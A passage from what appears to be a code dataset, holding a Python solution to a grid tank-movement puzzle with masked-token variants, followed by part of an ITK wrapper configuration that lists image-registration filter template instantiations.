"T = int(input())\n\n\ndef tank_command(s):\n global H, W, tank_dir\n if s == 'U':\n if pos[0] > 0:\n if board[pos[0] - 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] -= 1\n board[pos[0]][pos[1]] = '^'\n tank_dir = '^'\n elif s == 'D':\n if pos[0] < H - 1:\n if board[pos[0] + 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] += 1\n board[pos[0]][pos[1]] = 'v'\n tank_dir = 'v'\n elif s == 'R':\n if pos[1] < W - 1:\n if board[pos[0]][pos[1] + 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] += 1\n board[pos[0]][pos[1]] = '>'\n tank_dir = '>'\n elif s == 'L':\n if pos[1] > 0:\n if board[pos[0]][pos[1] - 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] -= 1\n board[pos[0]][pos[1]] = '<'\n tank_dir = '<'\n elif s == 'S':\n if tank_dir == '>':\n for i in range(pos[1] + 1, W):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '<':\n for i in range(pos[1] - 1, -1, -1):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '^':\n for i in range(pos[0] - 1, -1, -1):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n elif tank_dir == 'v':\n for i in range(pos[0] + 1, H):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n\n\ndata = ''\nfor tc in range(1, T + 1):\n H, W = map(int, input().split())\n board = []\n for i in range(H):\n board.append(list(input()))\n tank_dir = ''\n for i in range(W):\n for j in range(H):\n if board[j][i] in '><^v':\n tank_dir = board[j][i]\n pos = [j, i]\n break\n if tank_dir:\n break\n len_coms = int(input())\n coms = input()\n for com in coms:\n tank_command(com)\n ans = []\n for line in board:\n tmp = ''.join(line)\n ans.append(tmp)\n print(f'#{tc}', end=' ')\n for each in ans:\n print(each)\n",
"<assignment token>\n\n\ndef tank_command(s):\n global H, W, tank_dir\n if s == 'U':\n if pos[0] > 0:\n if board[pos[0] - 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] -= 1\n board[pos[0]][pos[1]] = '^'\n tank_dir = '^'\n elif s == 'D':\n if pos[0] < H - 1:\n if board[pos[0] + 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] += 1\n board[pos[0]][pos[1]] = 'v'\n tank_dir = 'v'\n elif s == 'R':\n if pos[1] < W - 1:\n if board[pos[0]][pos[1] + 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] += 1\n board[pos[0]][pos[1]] = '>'\n tank_dir = '>'\n elif s == 'L':\n if pos[1] > 0:\n if board[pos[0]][pos[1] - 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] -= 1\n board[pos[0]][pos[1]] = '<'\n tank_dir = '<'\n elif s == 'S':\n if tank_dir == '>':\n for i in range(pos[1] + 1, W):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '<':\n for i in range(pos[1] - 1, -1, -1):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '^':\n for i in range(pos[0] - 1, -1, -1):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n elif tank_dir == 'v':\n for i in range(pos[0] + 1, H):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n\n\n<assignment token>\nfor tc in range(1, T + 1):\n H, W = map(int, input().split())\n board = []\n for i in range(H):\n board.append(list(input()))\n tank_dir = ''\n for i in range(W):\n for j in range(H):\n if board[j][i] in '><^v':\n tank_dir = board[j][i]\n pos = [j, i]\n break\n if tank_dir:\n break\n len_coms = int(input())\n coms = input()\n for com in coms:\n tank_command(com)\n ans = []\n for line in board:\n tmp = ''.join(line)\n ans.append(tmp)\n print(f'#{tc}', end=' ')\n for each in ans:\n print(each)\n",
"<assignment token>\n\n\ndef tank_command(s):\n global H, W, tank_dir\n if s == 'U':\n if pos[0] > 0:\n if board[pos[0] - 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] -= 1\n board[pos[0]][pos[1]] = '^'\n tank_dir = '^'\n elif s == 'D':\n if pos[0] < H - 1:\n if board[pos[0] + 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] += 1\n board[pos[0]][pos[1]] = 'v'\n tank_dir = 'v'\n elif s == 'R':\n if pos[1] < W - 1:\n if board[pos[0]][pos[1] + 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] += 1\n board[pos[0]][pos[1]] = '>'\n tank_dir = '>'\n elif s == 'L':\n if pos[1] > 0:\n if board[pos[0]][pos[1] - 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] -= 1\n board[pos[0]][pos[1]] = '<'\n tank_dir = '<'\n elif s == 'S':\n if tank_dir == '>':\n for i in range(pos[1] + 1, W):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '<':\n for i in range(pos[1] - 1, -1, -1):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '^':\n for i in range(pos[0] - 1, -1, -1):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n elif tank_dir == 'v':\n for i in range(pos[0] + 1, H):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n\n\n<assignment token>\n<code token>\n",
"<assignment token>\n<function token>\n<assignment token>\n<code token>\n"
] | false |
99,858 | d156e5ffd4fc8a463871dfcce00436aa047bf9c4 | depends = ('ITKPyBase', 'ITKRegistrationCommon', 'ITKFiniteDifference', )
templates = (
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('MultiResolutionPDEDeformableRegistration', 'itk::MultiResolutionPDEDeformableRegistration', 'itkMultiResolutionPDEDeformableRegistrationIF2IF2IVF22F', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >, 2 >, float'),
('MultiResolutionPDEDeformableRegistration', 'itk::MultiResolutionPDEDeformableRegistration', 'itkMultiResolutionPDEDeformableRegistrationIF3IF3IVF33F', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >, 3 >, float'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
